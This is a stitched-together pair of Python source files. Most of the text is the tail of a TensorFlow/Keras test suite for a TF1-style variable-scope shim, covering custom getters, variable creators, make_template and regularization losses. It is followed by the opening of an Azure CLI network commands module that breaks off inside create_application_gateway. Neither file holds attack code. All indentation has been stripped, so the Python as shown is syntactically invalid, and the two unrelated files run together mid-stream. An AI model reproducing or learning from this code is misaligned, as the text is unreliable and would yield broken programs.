with tf.compat.v1.variable_scope(
inner, auxiliary_name_scope=False) as scope1:
with tf.name_scope(scope1.original_name_scope):
self.assertEqual(
tf.compat.v1.get_variable("w1", []).name,
"outer/inner/w1:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testGetVarWithDevice(self):
g = tf.Graph()
varname_type = []
def device_func(op):
if op.type in ["Variable", "VariableV2", "VarHandleOp"]:
varname_type.append((op.name, op.get_attr("dtype")))
return "/device:GPU:0"
with g.as_default():
with tf.compat.v1.device(device_func):
_ = tf.compat.v1.get_variable("x", (100, 200))
_ = tf.compat.v1.get_variable(
"y", dtype=tf.int64, initializer=numpy.arange(73))
self.assertEqual(varname_type[0], ("x", tf.float32))
self.assertEqual(varname_type[1], ("y", tf.int64))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testGetVariableWithRefDtype(self):
v = tf.compat.v1.get_variable("v", shape=[3, 4], dtype=tf.float32)
# Ensure it is possible to do get_variable with a _ref dtype passed in.
_ = tf.compat.v1.get_variable("w", shape=[5, 6], dtype=v.dtype)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testGetVariableWithInitializerWhichTakesNoArgs(self):
v = tf.compat.v1.get_variable("foo", initializer=lambda: [2])
self.assertEqual(v.name, "foo:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testGetVariableWithInitializerWhichTakesOptionalArgs(self):
v = tf.compat.v1.get_variable("foo", initializer=lambda x=True: [2])
self.assertEqual(v.name, "foo:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testTwoGraphs(self):
def f():
g1 = tf.Graph()
g2 = tf.Graph()
with g1.as_default():
with g2.as_default():
with tf.compat.v1.variable_scope("_"):
pass
self.assertRaisesRegex(ValueError,
"'_' is not a valid (?:root )?scope name", f)
class VariableScopeWithCustomGetterTest(tf.test.TestCase):
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testNonCallableGetterFails(self):
with self.assertRaisesRegex(ValueError, r"custom_getter .* not callable:"):
with tf.compat.v1.variable_scope("scope0", custom_getter=3):
tf.compat.v1.get_variable("name0")
with self.assertRaisesRegex(ValueError, r"custom_getter .* not callable:"):
tf.compat.v1.get_variable("name0", custom_getter=3)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testNoSideEffectsWithIdentityCustomGetter(self):
called = [0]
def custom_getter(getter, *args, **kwargs):
called[0] += 1
return getter(*args, **kwargs)
with tf.compat.v1.variable_scope(
"scope", custom_getter=custom_getter) as scope:
v = tf.compat.v1.get_variable("v", [1])
with tf.compat.v1.variable_scope(scope, reuse=True):
v2 = tf.compat.v1.get_variable("v", [1])
with tf.compat.v1.variable_scope("new_scope") as new_scope:
v3 = tf.compat.v1.get_variable("v3", [1])
with tf.compat.v1.variable_scope(
new_scope, reuse=True, custom_getter=custom_getter):
v4 = tf.compat.v1.get_variable("v3", [1])
self.assertIs(v, v2)
self.assertIs(v3, v4)
self.assertEqual(3, called[0]) # skipped one in the first new_scope
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testSynchronizationAndAggregationWithCustomGetter(self):
called = [0]
synchronization = tf.VariableSynchronization.AUTO
aggregation = tf.compat.v1.VariableAggregation.NONE
def custom_getter(getter, *args, **kwargs):
called[0] += 1
# Verify synchronization and aggregation kwargs are as expected.
self.assertEqual(kwargs["synchronization"], synchronization)
self.assertEqual(kwargs["aggregation"], aggregation)
return getter(*args, **kwargs)
with tf.compat.v1.variable_scope("scope", custom_getter=custom_getter):
tf.compat.v1.get_variable("v", [1])
self.assertEqual(1, called[0])
with tf.compat.v1.variable_scope("scope", custom_getter=custom_getter):
synchronization = tf.VariableSynchronization.ON_READ
aggregation = tf.compat.v1.VariableAggregation.MEAN
tf.compat.v1.get_variable(
"v1", [1], synchronization=synchronization, aggregation=aggregation)
self.assertEqual(2, called[0])
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVariableCreator(self):
variable_names = []
def creator_a(next_creator, **kwargs):
variable_names.append(kwargs.get("name", ""))
return next_creator(**kwargs)
def creator_b(next_creator, **kwargs):
kwargs["name"] = "forced_name"
return next_creator(**kwargs)
with tf.variable_creator_scope(creator_a):
with tf.variable_creator_scope(creator_b):
tf.compat.v1.Variable(1.0, name="one_name")
self.assertEqual(variable_names[0], "forced_name")
called = [False]
def creater_c(next_creator, **kwargs):
called[0] = True
self.assertEqual(kwargs["synchronization"],
tf.VariableSynchronization.ON_WRITE)
self.assertEqual(kwargs["aggregation"],
tf.compat.v1.VariableAggregation.MEAN)
return next_creator(**kwargs)
with tf.variable_creator_scope(creater_c):
tf.compat.v1.get_variable(
"v", [],
synchronization=tf.VariableSynchronization.ON_WRITE,
aggregation=tf.compat.v1.VariableAggregation.MEAN)
self.assertTrue(called[0])
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVariableCreatorNestingError(self):
def creator(next_creator, **kwargs):
return next_creator(**kwargs)
# Save the state so we can clean up at the end.
graph = tf.compat.v1.get_default_graph()
old_creator_stack = graph._variable_creator_stack
try:
scope = tf.variable_creator_scope(creator)
scope.__enter__()
with tf.variable_creator_scope(creator):
with self.assertRaises(RuntimeError):
scope.__exit__(None, None, None)
finally:
graph._variable_creator_stack = old_creator_stack
class VariableScopeMultithreadedTest(tf.test.TestCase):
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testReenterMainScope(self):
def thread_fn(graph, main_thread_scope):
with graph.as_default():
# Variable created with main scope will have prefix "main".
with tf.compat.v1.variable_scope(main_thread_scope):
with tf.compat.v1.variable_scope("foo"):
v = tf.compat.v1.get_variable("v", [])
self.assertEqual("main/foo/v:0", v.name)
# Variable created outside main scope will not have prefix "main".
with tf.compat.v1.variable_scope("bar"):
v = tf.compat.v1.get_variable("v", [])
self.assertEqual("bar/v:0", v.name)
graph = tf.compat.v1.get_default_graph()
with tf.compat.v1.variable_scope("main") as main_thread_scope:
thread = threading.Thread(
target=thread_fn, args=(graph, main_thread_scope))
thread.start()
thread.join()
class CompatV1TemplateScaleByY(variable_scope_shim.VariableScopeLayer):
def __init__(self, **kwargs):
super().__init__(**kwargs)
def my_op(x, scalar_name):
var1 = tf.compat.v1.get_variable(
scalar_name,
shape=[],
regularizer=regularizers.L2(),
initializer=tf.compat.v1.constant_initializer(1.5))
return x * var1
self.scale_by_y = tf.compat.v1.make_template(
"scale_by_y", my_op, scalar_name="y")
def forward_pass(self, inputs):
with tf.compat.v1.variable_scope("foo"):
return self.scale_by_y(inputs)
class VariableScopeModule(tf.Module):
"""Module that uses the shim."""
@variable_scope_shim.track_tf1_style_variables
def __call__(self, *args, **kwargs):
with self.name_scope:
return self.forward_pass(*args, **kwargs)
def get_compat_v1_regularization_losses(self):
"""Dict w/ regularization losses from `get_variable`&`compat.v1.layers`."""
return {name: regularizer() for name, regularizer
in self._tf1_style_var_store._regularizers.items()} # pylint: disable=protected-access
@combinations.generate(combinations.combine(mode=["eager"]))
class TF1VariableScopeLayerTest(tf.test.TestCase, parameterized.TestCase):
def test_get_variable(self):
# Test the shim when using `get_variable` (and regularizers) directly
class WrappedDenseLayer(variable_scope_shim.VariableScopeLayer):
def __init__(self, units, *args, **kwargs):
super().__init__(*args, **kwargs)
self.units = units
def forward_pass(self, inputs, training=None):
out = inputs
with tf.compat.v1.variable_scope("dense_one"):
# The weights are created with a `regularizer`,
# so the layer should track their regularization losses
kernel = tf.compat.v1.get_variable(
shape=[out.shape[-1], self.units],
regularizer=regularizers.L2(),
initializer=tf.compat.v1.ones_initializer(),
name="kernel")
bias = tf.compat.v1.get_variable(
shape=[self.units,],
initializer=tf.compat.v1.zeros_initializer(),
name="bias")
out = tf.matmul(out, kernel)
out = tf.nn.bias_add(out, bias)
with tf.compat.v1.variable_scope("nested_scope"):
with tf.compat.v1.variable_scope("dense_two"):
kernel = tf.compat.v1.get_variable(
shape=[out.shape[-1], self.units],
regularizer=regularizers.L2(),
initializer=tf.compat.v1.ones_initializer(),
name="kernel")
bias = tf.compat.v1.get_variable(
shape=[self.units,],
initializer=tf.compat.v1.zeros_initializer(),
name="bias")
out = tf.matmul(out, kernel)
out = tf.nn.bias_add(out, bias)
return out
layer = WrappedDenseLayer(10)
out = layer(tf.ones(shape=(5, 5)))
weights = {x.name: x for x in layer.variables}
# Verify the correct output, regularization losses, + variables were made
self.assertEqual(weights.keys(), {"dense_one/bias:0",
"dense_one/kernel:0",
"nested_scope/dense_two/bias:0",
"nested_scope/dense_two/kernel:0"})
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 50)
self.assertAllEqual(tf.add_n(layer.losses), 1.5)
# Verify reuse by updating the variables then re-running
weights["dense_one/kernel:0"].assign(tf.ones(shape=(5, 10)) * 2)
weights["nested_scope/dense_two/kernel:0"].assign(
tf.ones(shape=(10, 10)) * 2)
out = layer(tf.ones(shape=(5, 5)))
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 200)
self.assertAllEqual(tf.add_n(layer.losses), 6)
def test_compat_v1_layer(self):
# Test the shim when using `compat.v1` layers
class WrappedDenseLayer(variable_scope_shim.VariableScopeLayer):
def __init__(self, units, *args, **kwargs):
super().__init__(*args, **kwargs)
self.units = units
def forward_pass(self, inputs, training=None):
out = core_layers.dense(
inputs, self.units, name="dense_one",
kernel_initializer=tf.compat.v1.ones_initializer(),
kernel_regularizer="l2")
with tf.compat.v1.variable_scope("nested_scope"):
out = core_layers.dense(
out, self.units, name="dense_two",
kernel_initializer=tf.compat.v1.ones_initializer(),
kernel_regularizer="l2")
return out
layer = WrappedDenseLayer(10)
out = layer(tf.ones(shape=(5, 5)))
weights = {x.name: x for x in layer.variables}
# Verify the correct output, losses, + variables were made
self.assertEqual(weights.keys(), {"dense_one/bias:0",
"dense_one/kernel:0",
"nested_scope/dense_two/bias:0",
"nested_scope/dense_two/kernel:0"})
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 50)
self.assertAllEqual(tf.add_n(layer.losses), 1.5)
# Verify reuse by updating the variables then re-running
weights["dense_one/kernel:0"].assign(tf.ones(shape=(5, 10)) * 2)
weights["nested_scope/dense_two/kernel:0"].assign(
tf.ones(shape=(10, 10)) * 2)
out = layer(tf.ones(shape=(5, 5)))
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 200)
self.assertAllEqual(tf.add_n(layer.losses), 6)
def test_shim_exporting(self):
class WrappedDenseLayer(variable_scope_shim.VariableScopeLayer):
def __init__(self, units, *args, **kwargs):
super().__init__(*args, **kwargs)
self.units = units
def forward_pass(self, inputs, training=None):
out = core_layers.dense(
inputs,
self.units,
name="dense_one",
kernel_initializer=tf.compat.v1.ones_initializer(),
kernel_regularizer="l2")
with tf.compat.v1.variable_scope("nested_scope"):
out = core_layers.dense(
out,
self.units,
name="dense_two",
kernel_initializer=tf.compat.v1.ones_initializer(),
kernel_regularizer="l2")
return out
layer = WrappedDenseLayer(10)
layer(tf.ones(shape=(5, 5)))
tmp_dir = self.get_temp_dir()
tf.saved_model.save(layer, tmp_dir)
def test_module_get_variable(self):
# Test the module shim when using `get_variable` (and regularizers) directly
class WrappedDenseLayer(VariableScopeModule):
def __init__(self, units, *args, **kwargs):
super().__init__(*args, **kwargs)
self.units = units
def forward_pass(self, inputs, training=None):
out = inputs
with tf.compat.v1.variable_scope("dense_one"):
# The weights are created with a `regularizer`,
# so the layer should track their regularization losses
kernel = tf.compat.v1.get_variable(
shape=[out.shape[-1], self.units],
regularizer=regularizers.L2(),
initializer=tf.compat.v1.ones_initializer(),
name="kernel")
bias = tf.compat.v1.get_variable(
shape=[self.units,],
initializer=tf.compat.v1.zeros_initializer(),
name="bias")
out = tf.matmul(out, kernel)
out = tf.nn.bias_add(out, bias)
with tf.compat.v1.variable_scope("nested_scope"):
with tf.compat.v1.variable_scope("dense_two"):
kernel = tf.compat.v1.get_variable(
shape=[out.shape[-1], self.units],
regularizer=regularizers.L2(),
initializer=tf.compat.v1.ones_initializer(),
name="kernel")
bias = tf.compat.v1.get_variable(
shape=[self.units,],
initializer=tf.compat.v1.zeros_initializer(),
name="bias")
out = tf.matmul(out, kernel)
out = tf.nn.bias_add(out, bias)
return out
layer = WrappedDenseLayer(10)
out = layer(tf.ones(shape=(5, 5)))
weights = {x.name: x for x in layer.variables}
# Verify the correct output, regularization losses, + variables were made
self.assertEqual(weights.keys(), {"dense_one/bias:0",
"dense_one/kernel:0",
"nested_scope/dense_two/bias:0",
"nested_scope/dense_two/kernel:0"})
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 50)
self.assertAllEqual(
tf.add_n(layer.get_compat_v1_regularization_losses().values()), 1.5)
# Verify reuse by updating the variables then re-running
weights["dense_one/kernel:0"].assign(tf.ones(shape=(5, 10)) * 2)
weights["nested_scope/dense_two/kernel:0"].assign(
tf.ones(shape=(10, 10)) * 2)
out = layer(tf.ones(shape=(5, 5)))
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 200)
self.assertAllEqual(
tf.add_n(layer.get_compat_v1_regularization_losses().values()), 6)
def test_module_compat_v1_layer(self):
# Test the module shim when using `compat.v1` layers
class WrappedDenseLayer(VariableScopeModule):
def __init__(self, units, *args, **kwargs):
super().__init__(*args, **kwargs)
self.units = units
def forward_pass(self, inputs, training=None):
out = core_layers.dense(
inputs, self.units, name="dense_one",
kernel_initializer=tf.compat.v1.ones_initializer(),
kernel_regularizer="l2")
with tf.compat.v1.variable_scope("nested_scope"):
out = core_layers.dense(
out, self.units, name="dense_two",
kernel_initializer=tf.compat.v1.ones_initializer(),
kernel_regularizer="l2")
return out
layer = WrappedDenseLayer(10)
out = layer(tf.ones(shape=(5, 5)))
weights = {x.name: x for x in layer.variables}
# Verify the correct output, losses, + variables were made
self.assertEqual(weights.keys(), {"dense_one/bias:0",
"dense_one/kernel:0",
"nested_scope/dense_two/bias:0",
"nested_scope/dense_two/kernel:0"})
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 50)
self.assertAllEqual(tf.add_n(
layer.get_compat_v1_regularization_losses().values()), 1.5)
# Verify reuse by updating the variables then re-running
weights["dense_one/kernel:0"].assign(tf.ones(shape=(5, 10)) * 2)
weights["nested_scope/dense_two/kernel:0"].assign(
tf.ones(shape=(10, 10)) * 2)
out = layer(tf.ones(shape=(5, 5)))
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 200)
self.assertAllEqual(tf.add_n(
layer.get_compat_v1_regularization_losses().values()), 6)
def test_shim_nesting(self):
# Test that nesting the shim in itself works
class NestedLayer(variable_scope_shim.VariableScopeLayer):
def __init__(self, units, name, *args, **kwargs):
super().__init__(*args, name=name, **kwargs)
self.units = units
def forward_pass(self, inputs):
out = inputs
with tf.compat.v1.variable_scope(self.name):
# The weights are created with a `regularizer`,
# so the layer should track their regularization losses
kernel = tf.compat.v1.get_variable(
shape=[out.shape[-1], self.units],
regularizer=regularizers.L2(1.0),
initializer=tf.compat.v1.ones_initializer(),
name="kernel")
bias = tf.compat.v1.get_variable(
shape=[self.units,],
initializer=tf.compat.v1.initializers.zeros,
name="bias")
out = tf.linalg.matmul(out, kernel)
out = tf.compat.v1.nn.bias_add(out, bias)
return out
class WrappedDenseLayer(variable_scope_shim.VariableScopeLayer):
def __init__(self, units, **kwargs):
super().__init__(**kwargs)
self.units = units
self.dense_layer_a = None
self.dense_layer_b = None
def forward_pass(self, inputs):
# Only create the nested tf.variable/module/layer/model if it has not
# already been created!
if not self.dense_layer_a:
self.dense_layer_a = NestedLayer(self.units * 2, "dense_one")
out = self.dense_layer_a(inputs)
if not self.dense_layer_b:
self.dense_layer_b = NestedLayer(self.units, "dense_two")
out = self.dense_layer_b(out)
return out
layer = WrappedDenseLayer(5)
out = layer(tf.ones(shape=(1, 3)))
weights = {x.name: x for x in layer.variables}
# Verify the correct output, losses, + variables were made
# (Specifically: no double-counting of any weights or reg. losses
# between nested components!)
self.assertEqual({var.name for var in layer.trainable_weights},
{"dense_one/bias:0",
"dense_one/kernel:0",
"dense_two/bias:0",
"dense_two/kernel:0"})
self.assertEqual({var.name for var in layer.dense_layer_a.weights},
{"dense_one/bias:0",
"dense_one/kernel:0"})
self.assertEqual({var.name for var in layer.dense_layer_b.weights},
{"dense_two/bias:0",
"dense_two/kernel:0"})
self.assertAllEqual(out, tf.ones(shape=(1, 5)) * 30)
self.assertAllEqual(tf.add_n(layer.dense_layer_a.losses), 30)
self.assertAllEqual(tf.add_n(layer.dense_layer_b.losses), 50)
self.assertAllEqual(tf.add_n(layer.losses), 80)
# Verify reuse by updating the variables then re-running
weights["dense_one/kernel:0"].assign(tf.ones(shape=(3, 10)) * 2)
weights["dense_two/kernel:0"].assign(
tf.ones(shape=(10, 5)) * 2)
out = layer(tf.ones(shape=(1, 3)))
self.assertAllEqual(out, tf.ones(shape=(1, 5)) * 120)
self.assertAllEqual(tf.add_n(layer.losses), 320)
def test_compat_v1_make_template_in_shim_eager(self):
# Test the shim when using `compat.v1.make_template`
# Verify it works correctly in eager
layer = CompatV1TemplateScaleByY()
for _ in range(3):
# Use multiple calls to verify that no new weights get created
self.assertAllEqual(layer(tf.ones(shape=(2, 3))),
tf.constant(1.5, shape=(2, 3)))
self.assertAllEqual({var.name: var.numpy() for var in layer.weights},
{"foo/scale_by_y/y:0": 1.5})
self.assertAllEqual(tf.add_n(layer.losses),
regularizers.L2()(layer.weights[0]))
def test_compat_v1_make_template_in_shim_tf_function(self):
# Test the shim when using `compat.v1.make_template`
# Verify it works correctly in a tf.function
# when made outside the function
layer = CompatV1TemplateScaleByY()
@tf.function
def foo(x):
return layer(x), tf.add_n(layer.losses)
for _ in range(3):
# Use multiple calls to verify that no new weights get created
out, loss = foo(tf.ones(shape=(2, 3)))
self.assertAllEqual(out, tf.constant(1.5, shape=(2, 3)))
self.assertAllEqual(loss, regularizers.L2()(layer.weights[0]))
self.assertAllEqual({var.name: var.numpy() for var in layer.weights},
{"foo/scale_by_y/y:0": 1.5})
def test_compat_v1_make_template_in_trace_in_shim(self):
# Test the shim when using `compat.v1.make_template`
# Verify it works correctly when the make_template/layer/shim
# is created on the first tf.function trace!
layers = {}
@tf.function
def bar(x):
if "layer" not in layers:
layers["layer"] = CompatV1TemplateScaleByY()
layer = layers["layer"]
return layer(x), tf.add_n(layer.losses)
for _ in range(3):
# Use multiple calls to verify that no new weights get created
out, loss = bar(tf.ones(shape=(2, 3)))
self.assertAllEqual(out, tf.constant(1.5, shape=(2, 3)))
self.assertAllEqual(loss, regularizers.L2()(layers["layer"].weights[0]))
self.assertAllEqual(
{var.name: var.numpy() for var in layers["layer"].weights},
{"foo/scale_by_y/y:0": 1.5})
def test_only_track_get_variable(self):
# Test the shim does not try tracking or reusing variables
# that were not created by get_variable. These variables/modules/layers
# need to be tracked separately
class WrappedDenseLayer(variable_scope_shim.VariableScopeLayer):
def __init__(self, units, **kwargs):
super().__init__(**kwargs)
self.units = units
self._dense_model = None
def forward_pass(self, inputs):
dense_layer = core.Dense(
self.units, name="dense",
kernel_initializer=tf.compat.v1.ones_initializer(),
kernel_regularizer="l2")
return dense_layer(inputs)
layer = WrappedDenseLayer(10)
out = layer(tf.ones(shape=(5, 5)))
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 5)
self.assertEmpty(layer.weights)
def test_embedded_keras_model(self):
# Test the shim when embedding a Keras model inside of it
# And assigning the model to an attribute
class WrappedDenseLayer(variable_scope_shim.VariableScopeLayer):
def __init__(self, units, **kwargs):
super().__init__(**kwargs)
self.units = units
self._dense_model = None
def forward_pass(self, inputs):
if not self._dense_model:
inp = input_layer_module.Input(shape=inputs.shape)
dense_layer = core.Dense(
self.units, name="dense",
kernel_initializer=tf.compat.v1.ones_initializer(),
kernel_regularizer="l2")
self._dense_model = training_module.Model(
inputs=inp, outputs=dense_layer(inp))
return self._dense_model(inputs)
layer = WrappedDenseLayer(10)
out = layer(tf.ones(shape=(5, 5)))
weights = {x.name: x for x in layer.variables}
# Verify the correct output, losses, + variables were made
self.assertEqual(weights.keys(), {"dense/bias:0",
"dense/kernel:0"})
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 5)
self.assertAllEqual(tf.add_n(layer.losses), 0.5)
# Verify reuse by updating the variables then re-running
weights["dense/kernel:0"].assign(
tf.ones(shape=(5, 10)) * 2)
out = layer(tf.ones(shape=(5, 5)))
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 10)
self.assertAllEqual(tf.add_n(layer.losses), 2)
def test_embedded_keras_model_in_module(self):
# Test the module shim when embedding a Keras model inside of it
# And assigning the model to an attribute
class WrappedDenseLayer(VariableScopeModule):
def __init__(self, units, **kwargs):
super().__init__(**kwargs)
self.units = units
self._dense_model = None
def forward_pass(self, inputs):
if not self._dense_model:
inp = input_layer_module.Input(shape=inputs.shape)
dense_layer = core.Dense(
self.units, name="dense",
kernel_initializer=tf.compat.v1.ones_initializer(),
kernel_regularizer="l2")
self._dense_model = training_module.Model(
inputs=inp, outputs=dense_layer(inp))
return self._dense_model(inputs)
layer = WrappedDenseLayer(10)
out = layer(tf.ones(shape=(5, 5)))
weights = {x.name: x for x in layer.variables}
# Verify the correct output, losses, + variables were made
self.assertEqual(weights.keys(), {"dense/bias:0",
"dense/kernel:0"})
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 5)
# The module shim will only track regularization losses made by
# compat.v1.layers and compat.v1.get_variable. Other regularization
# losses must be tracked by separate user-created mechanisms.
self.assertEmpty(layer.get_compat_v1_regularization_losses())
# Verify reuse by updating the variables then re-running
weights["dense/kernel:0"].assign(
tf.ones(shape=(5, 10)) * 2)
out = layer(tf.ones(shape=(5, 5)))
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 10)
# The module shim will only track regularization losses made by
# compat.v1.layers and compat.v1.get_variable. Other regularization
# losses must be tracked by separate user-created mechanisms.
self.assertEmpty(layer.get_compat_v1_regularization_losses())
def test_training_arg(self):
# Test the shim when passing in a Keras `training` arg
class TrainingCheckLayer(variable_scope_shim.VariableScopeLayer):
def __init__(self, units, *args, **kwargs):
super().__init__(*args, **kwargs)
self.units = units
def forward_pass(self, inputs, training=None):
if training:
out = core_layers.dense(inputs, self.units, name="dense_training")
else:
out = core_layers.dense(inputs, self.units, name="dense_no_training")
return out
layer = TrainingCheckLayer(10)
layer(tf.ones(shape=(5, 5)), training=True)
weights = {x.name: x for x in layer.variables}
# Verify the correct variables were made
self.assertEqual(weights.keys(),
{"dense_training/bias:0", "dense_training/kernel:0"})
layer = TrainingCheckLayer(10)
layer(tf.ones(shape=(5, 5)))
weights = {x.name: x for x in layer.variables}
# Verify the correct variables were made
self.assertEqual(weights.keys(),
{"dense_no_training/bias:0", "dense_no_training/kernel:0"})
def test_incorrect_decoration(self):
# Raise an error if you incorrectly decorate a method
# that is not a method of a Module, layer, or model:
@variable_scope_shim.track_tf1_style_variables
def foo(x):
return x * 2
with self.assertRaisesRegex(ValueError, "does not extend"):
foo(tf.ones(shape=(4, 4)))
if __name__ == "__main__":
tf.test.main()
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from collections import Counter, OrderedDict
from msrestazure.tools import parse_resource_id, is_valid_resource_id, resource_id
from knack.log import get_logger
from azure.mgmt.trafficmanager.models import MonitorProtocol, ProfileStatus
# pylint: disable=no-self-use,no-member,too-many-lines,unused-argument
from azure.cli.core.commands import cached_get, cached_put, upsert_to_collection, get_property
from azure.cli.core.commands.client_factory import get_subscription_id, get_mgmt_service_client
from azure.cli.core.util import CLIError, sdk_no_wait, find_child_item, find_child_collection
from azure.cli.core.azclierror import InvalidArgumentValueError, RequiredArgumentMissingError, \
UnrecognizedArgumentError, ResourceNotFoundError, CLIInternalError
from azure.cli.core.profiles import ResourceType, supported_api_version
from azure.cli.command_modules.network._client_factory import network_client_factory
from azure.cli.command_modules.network.zone_file.parse_zone_file import parse_zone_file
from azure.cli.command_modules.network.zone_file.make_zone_file import make_zone_file
import threading
import time
import platform
import subprocess
logger = get_logger(__name__)
# region Utility methods
def _log_pprint_template(template):
import json
logger.info('==== BEGIN TEMPLATE ====')
logger.info(json.dumps(template, indent=2))
logger.info('==== END TEMPLATE ====')
def _get_default_name(balancer, property_name, option_name):
return _get_default_value(balancer, property_name, option_name, True)
def _get_default_id(balancer, property_name, option_name):
return _get_default_value(balancer, property_name, option_name, False)
def _get_default_value(balancer, property_name, option_name, return_name):
values = [x.id for x in getattr(balancer, property_name)]
if len(values) > 1:
raise CLIError("Multiple possible values found for '{0}': {1}\nSpecify '{0}' "
"explicitly.".format(option_name, ', '.join(values)))
if not values:
raise CLIError("No existing values found for '{0}'. Create one first and try "
"again.".format(option_name))
return values[0].rsplit('/', 1)[1] if return_name else values[0]
# endregion
# region Generic list commands
def _generic_list(cli_ctx, operation_name, resource_group_name):
ncf = network_client_factory(cli_ctx)
operation_group = getattr(ncf, operation_name)
if resource_group_name:
return operation_group.list(resource_group_name)
return operation_group.list_all()
def list_vnet(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'virtual_networks', resource_group_name)
def list_express_route_circuits(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'express_route_circuits', resource_group_name)
def create_express_route_auth(cmd, resource_group_name, circuit_name, authorization_name):
ExpressRouteCircuitAuthorization = cmd.get_models('ExpressRouteCircuitAuthorization')
client = network_client_factory(cmd.cli_ctx).express_route_circuit_authorizations
return client.begin_create_or_update(resource_group_name,
circuit_name,
authorization_name,
ExpressRouteCircuitAuthorization())
def list_lbs(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'load_balancers', resource_group_name)
def list_nics(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'network_interfaces', resource_group_name)
def list_nsgs(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'network_security_groups', resource_group_name)
def list_nsg_rules(cmd, resource_group_name, network_security_group_name, include_default=False):
client = network_client_factory(cmd.cli_ctx).network_security_groups
nsg = client.get(resource_group_name, network_security_group_name)
rules = nsg.security_rules
if include_default:
rules = rules + nsg.default_security_rules
return rules
def list_custom_ip_prefixes(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'custom_ip_prefixes', resource_group_name)
def list_public_ips(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'public_ip_addresses', resource_group_name)
def list_public_ip_prefixes(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'public_ip_prefixes', resource_group_name)
def list_route_tables(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'route_tables', resource_group_name)
def list_application_gateways(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'application_gateways', resource_group_name)
def list_network_watchers(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'network_watchers', resource_group_name)
# endregion
# region ApplicationGateways
# pylint: disable=too-many-locals
def _is_v2_sku(sku):
return 'v2' in sku
# pylint: disable=too-many-statements
def create_application_gateway(cmd, application_gateway_name, resource_group_name, location=None,
tags=None, no_wait=False, capacity=2,
cert_data=None, cert_password=None, key_vault_secret_id=None,
frontend_port=None, http_settings_cookie_based_affinity='disabled',
http_settings_port=80, http_settings_protocol='Http',
routing_rule_type='Basic', servers=None,
sku=None,
private_ip_address=None, public_ip_address=None,
public_ip_address_allocation=None,
subnet='default', subnet_address_prefix='10.0.0.0/24',
virtual_network_name=None, vnet_address_prefix='10.0.0.0/16',
public_ip_address_type=None, subnet_type=None, validate=False,
connection_draining_timeout=0, enable_http2=None, min_capacity=None, zones=None,
custom_error_pages=None, firewall_policy=None, max_capacity=None,
user_assigned_identity=None,
enable_private_link=False,
private_link_ip_address=None,
private_link_subnet='PrivateLinkDefaultSubnet',
private_link_subnet_prefix='10.0.1.0/24',
private_link_primary=None,
trusted_client_cert=None,
ssl_profile=None,
ssl_profile_id=None,
ssl_cert_name=None):
from azure.cli.core.util import random_string
from azure.cli.core.commands.arm import ArmTemplateBuilder
from azure.cli.command_modules.network._template_builder import (
build_application_gateway_resource, build_public_ip_resource, build_vnet_resource)
DeploymentProperties = cmd.get_models('DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
IPAllocationMethod = cmd.get_models('IPAllocationMethod')
tags = tags or {}
sku_tier = sku.split('_', 1)[0] if not _is_v2_sku(sku) else sku
http_listener_protocol = 'https' if (cert_data or key_vault_secret_id) else 'http'
private_ip_allocation = 'Static' if private_ip_address else 'Dynamic'
virtual_network_name = virtual_network_name or '{}Vnet'.format(application_gateway_name)
# Build up the ARM template
master_template = ArmTemplateBuilder()
ag_dependencies = []
public_ip_id = public_ip_address if is_valid_resource_id(public_ip_address) else None
subnet_id = subnet if is_valid_resource_id(subnet) else None
private_ip_allocation = IPAllocationMethod.static.value if private_ip_address \
else IPAllocationMethod.dynamic.value
network_id_template = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Network')
if subnet_type == 'new':
ag_dependencies.append('Microsoft.Network/virtualNetworks/{}'.format(virtual_network_name))
vnet = build_vnet_resource(
cmd, virtual_network_name, location, tags, vnet_address_prefix, subnet,
subnet_address_prefix,
enable_private_link=enable_private_link,
private_link_subnet=private_link_subnet,
private_link_subnet_prefix=private_link_subnet_prefix)
master_template.add_resource(vnet)
subnet_id = '{}/virtualNetworks/{}/subnets/{}'.format(network_id_template,
virtual_network_name, subnet)
if public_ip_address_type == 'new':
